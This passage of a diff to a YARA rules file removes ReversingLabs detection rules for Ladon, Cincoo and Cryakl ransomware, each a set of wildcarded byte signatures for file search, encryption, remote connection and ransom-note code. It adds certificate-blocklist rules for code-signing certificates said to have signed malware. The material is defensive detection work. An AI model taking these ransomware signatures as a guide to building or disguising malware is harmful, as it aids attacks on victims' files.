-            7C ?? 8B 45 ?? 50 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ??
-            8B 45 ?? 50 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8
-            ?? ?? ?? ?? 52 50 8B C3 99 29 04 24 19 54 24 ?? 58 5A 52 50 8B 45 ?? E8 ?? ?? ?? ??
-            8B D6 8B 4D ?? 8B 45 ?? 8B 38 FF 57 ?? 8B C3 99 29 45 ?? 19 55 ?? 8B D3 8B C6 E8 ??
-            ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 0F 87 ?? ?? ?? ?? EB ?? 0F 8F ?? ?? ?? ?? A1
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B
-            48 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? A1 ?? ?? ?? ?? 8B 00 8B 80 ??
-            ?? ?? ?? 8B 80 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 18 FF 53 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33
-            C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
-            ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ??
-            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ??
-            EB ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$search_files = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D
-            ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 55 ?? 89 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
-            89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B
-            55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 0F 94 C3 E9 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 66 83 38 ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            85 C0 75 ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ??
-            ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 0D ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66
-            83 38 ?? 74 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
-            75 ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
-            8B C6 8B 08 FF 51 ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 94 C3 84 DB 0F 85 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? 8B D8 4B 85 DB 7C ??
-            43 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C6 8B 38 FF
-            57 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? FF 85 ?? ?? ?? ?? 4B 75 ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 5A 59 59
-            64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$remote_connection = {
-            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ??
-            8D 4D ?? 8B 45 ?? 8B 90 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 08 FF
-            51 ?? 8B 45 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
-            05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
-            89 20 6A ?? 8D 45 ?? 50 8D 4D ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ??
-            8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 4D ??
-            8B 45 ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
-            74 ?? C7 45 ?? ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 83 EB ?? 8B 1B 68 ?? ?? ?? ?? 8B CB
-            BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 8B 90 ?? ?? ?? ?? 8D 45
-            ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B2 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 45
-            ?? 8B 90 ?? ?? ?? ?? 8D 45 ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 8B 75 ?? 85 F6 74 ?? 83 EE ?? 8B 36 68 ?? ?? ?? ?? 8B CE BA ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 33 C0 A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59
-            59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $search_files and $encrypt_files and $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HELP, d.o.o." and pe.signatures [ i ] . serial == "6a:24:1f:fe:96:a6:34:9d:f6:08:d2:2c:02:94:22:68" and 1605052800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ladon : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Aa1D84779792B57F91Fe7A4Bde041942 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ladon ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ebc8f957-cdcf-54eb-bd02-74088cf51768"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "8ec25296-2e51-53ec-a2f5-a25961079c27"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Ladon.yara#L1-L101"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11842-L11860"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "979e3f3bf6a67bf10b6bfdd2eeb722d8836096076b7e88c6d4aca041a1a9eecb"
+		logic_hash = "682af8c799acaca531724c5b3184b855e64ec4531fcc333a485ba2f63331cdae"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ladon"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66
-            3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2
-            75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ??
-            83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 57 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 85
-            ?? ?? ?? ?? 53 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF 85 DB 74 ?? 90 8B 45 ?? 8B
-            34 B8 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 66 8B 08 66 3B 0E 75 ?? 66 85 C9 74 ??
-            66 8B 48 ?? 66 3B 4E ?? 75 ?? 83 C0 ?? 83 C6 ?? 66 85 C9 75 ?? 33 C0 EB ?? 1B C0 83
-            C8 ?? 85 C0 74 ?? 47 3B FB 72 ?? 8B 75 ?? 8B 7D ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF
-            15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ?? 33 DB 83 F8 ?? 0F
-            95 C3 FF 15 ?? ?? ?? ?? 5E 8B C3 5B 5F 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 75 ?? 33 DB 89 5D ?? E8 ?? ?? ?? ?? 8B F8 83
-            C4 ?? 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 83 3F ?? 0F 85 ?? ?? ?? ?? 53 68 ?? ?? ?? ??
-            FF 77 ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF
-            77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF
-            77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF
-            77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF
-            77 ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 89 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 83 3E ?? 0F 85
-            ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ??
-            8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 83 39 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 70
-            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? FF 75 ?? 33 FF C7 45
-            ?? ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 83 3E ?? 75 ?? 57
-            68 ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? FF 70 ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74
-            ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 8D 7B ?? A1 ??
-            ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 1D ?? ?? ?? ?? 85 F6 74 ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? 8B C7 5F 5E 5B 8B E5 5D C3 FF 76 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 78 ?? 85 FF 74 ?? 8B 47 ?? 89 45
-        }
-		$encrypt_files_p2 = {
-            8B 70 ?? 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 04 75 ?? ?? ?? ?? 50 6A ?? FF 15 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 84 9D ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 0C 75
-            ?? ?? ?? ?? 51 50 8D 46 ?? 50 8B 45 ?? FF 70 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 3F
-            43 85 FF 75 ?? 68 ?? ?? ?? ?? C7 84 9D ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 77 ?? 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50
-            6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B C8 89 4D ?? 85 C9 0F 84 ?? ?? ?? ??
-            8B C6 99 6A ?? 2B C2 D1 F8 6A ?? 89 45 ?? 8D 45 ?? 50 51 6A ?? 56 FF 77 ?? FF 15 ??
-            ?? ?? ?? 8B 7D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 57 8B 7D ?? 8B F0 57 56 FF 15 ?? ?? ?? ?? 56 FF 15
-            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ??
-            ?? ?? 8B 7D ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 05 ?? ?? ??
-            ?? ?? ?? ?? ?? 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 85 DB 74 ?? FF B4 B5 ??
-            ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 46 3B F3 72 ?? 8B 45 ?? 5F 5E
-            5B 8B E5 5D C3
-        }
-		$remote_connection = {
-            8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 68 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B E5 5D C3 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 85 C0 0F 88 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 78 ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ??
-            85 F6 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ??
-            83 C4 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5E 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AXIUM NORTHWESTERN HYDRO INC." and ( pe.signatures [ i ] . serial == "00:aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" or pe.signatures [ i ] . serial == "aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" ) and 1639872000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Cincoo : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3C98B6872Fbb1F4Ae37A4Caa749D24C2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Cincoo ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c7c2773c-5056-5127-8af7-7f5c5a8ea8a1"
-		date = "2022-06-21"
-		modified = "2022-06-21"
+		id = "f4cc9c94-eb96-5380-9e12-cab5ec010ab8"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Cincoo.yara#L1-L78"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11862-L11878"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6a7562cae90754ea75a9fb98ce73ebdb9acf1ad7f28f2240abe6cb592d717ca3"
+		logic_hash = "c534ad306f85e12eca2336e998120deb4ba8d0d63b8331986ec7fe4ac69ba65a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Cincoo"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
-            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 55 ?? 8B D9 83 7B ?? ?? 8B F3 8B 45 ?? 8B 7D
-            ?? 89 45 ?? 72 ?? 8B 33 8D 4E ?? 66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 0F 84
-            ?? ?? ?? ?? 3B 73 ?? 0F 85 ?? ?? ?? ?? 88 45 ?? 8D 55 ?? FF 75 ?? 8D 4D ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? C7 45 ?? ?? ?? ??
-            ?? 50 8B CB E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B
-            C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ??
-            ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7B ?? ?? 72 ?? 8B 1B 8B 75 ?? 57 56 53 E8 ?? ??
-            ?? ?? 85 C0 75 ?? 8B 36 8B CF E8 ?? ?? ?? ?? 84 C0 74 ?? 57 56 E8 ?? ?? ?? ?? 85 C0
-            75 ?? 8B CF E8 ?? ?? ?? ?? 84 C0 75 ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
-            5B 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC 83 EC ?? 8B 45 ?? 53 8B D9 89 45 ?? B9 ?? ?? ?? ?? 8B C1 56 8B 53 ?? 2B C2
-            8B 75 ?? 89 55 ?? 57 3B C6 0F 82 ?? ?? ?? ?? 8B 7B ?? 8D 04 32 8B F0 89 45 ?? 83 CE
-            ?? 89 7D ?? 3B F1 76 ?? 8B F1 EB ?? 8B C7 D1 E8 2B C8 3B F9 76 ?? BE ?? ?? ?? ?? EB
-            ?? 03 C7 3B F0 0F 42 F0 33 C9 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8 81 F9 ?? ?? ?? ??
-            72 ?? 8D 41 ?? 3B C1 0F 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ??
-            ?? ?? 8B 55 ?? 8D 78 ?? 83 E7 ?? 89 47 ?? EB ?? 85 C9 74 ?? 51 E8 ?? ?? ?? ?? 8B 55
-            ?? 83 C4 ?? 8B F8 EB ?? 33 FF 8B 45 ?? 89 43 ?? 8B 45 ?? 89 73 ?? 8D 34 3A 03 C6 83
-            7D ?? ?? 89 45 ?? 52 72 ?? 8B 33 56 57 E8 ?? ?? ?? ?? FF 75 ?? 8B 45 ?? FF 75 ?? 03
-            C7 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 4D ?? 41 C6 00 ?? 81 F9 ?? ?? ?? ?? 72 ??
-            8B 56 ?? 83 C1 ?? 2B F2 8D 46 ?? 83 F8 ?? 77 ?? 8B F2 51 56 E8 ?? ?? ?? ?? 83 C4 ??
-            89 3B 8B C3 5F 5E 5B 8B E5 5D C2 ?? ?? 53 57 E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 56 E8
-            ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? C6 00 ?? 8B C3 89 3B 5F 5E 5B 8B E5 5D C2 ?? ?? E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC CC CC 56 8B F1 FF 76 ?? E8 ?? ?? ?? ?? 8B
-            4E ?? 83 F9 ?? 72 ?? 8B 06 8D 0C 4D ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83
-            C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ??
-            ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? 66 89 06 5E C3 E8 ?? ?? ?? ?? CC CC CC CC CC CC
-            8B 09 85 C9 74 ?? 8B 01 6A ?? FF 10 C3
-        }
-		$drop_ransom_note = {
-            52 51 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 8D 4D ?? C6 46 ?? ??
-            E8 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B CE C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 8D
-            4E ?? 50 E8 ?? ?? ?? ?? 81 CF ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ??
-            ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 89 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 83 F8 ??
-            72 ?? 83 FA ?? 8D B5 ?? ?? ?? ?? 8D 41 ?? 0F 43 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D
-            04 0E 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 44 30 ?? ?? 8D 85 ?? ?? ?? ??
-            EB
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO SMART" and pe.signatures [ i ] . serial == "3c:98:b6:87:2f:bb:1f:4a:e3:7a:4c:aa:74:9d:24:c2" and 1613370100 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Cryakl : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_E4E795Fd1Fd25595B869Ce22Aa7Dc49F : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Cryakl ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5c668278-458e-5b13-83c4-63beab5249ed"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "9c6d2be7-093c-5ce2-83af-6ab9b46603bc"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Cryakl.yara#L1-L64"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11880-L11898"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "51d50ab1ce021e2facbca3a35af372186287a8d69b66651c9804234a409d9932"
+		logic_hash = "ced47bd69b58de9e6b2aa7518ccceca088884acb79c0803c3defe6b115a0abb6"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
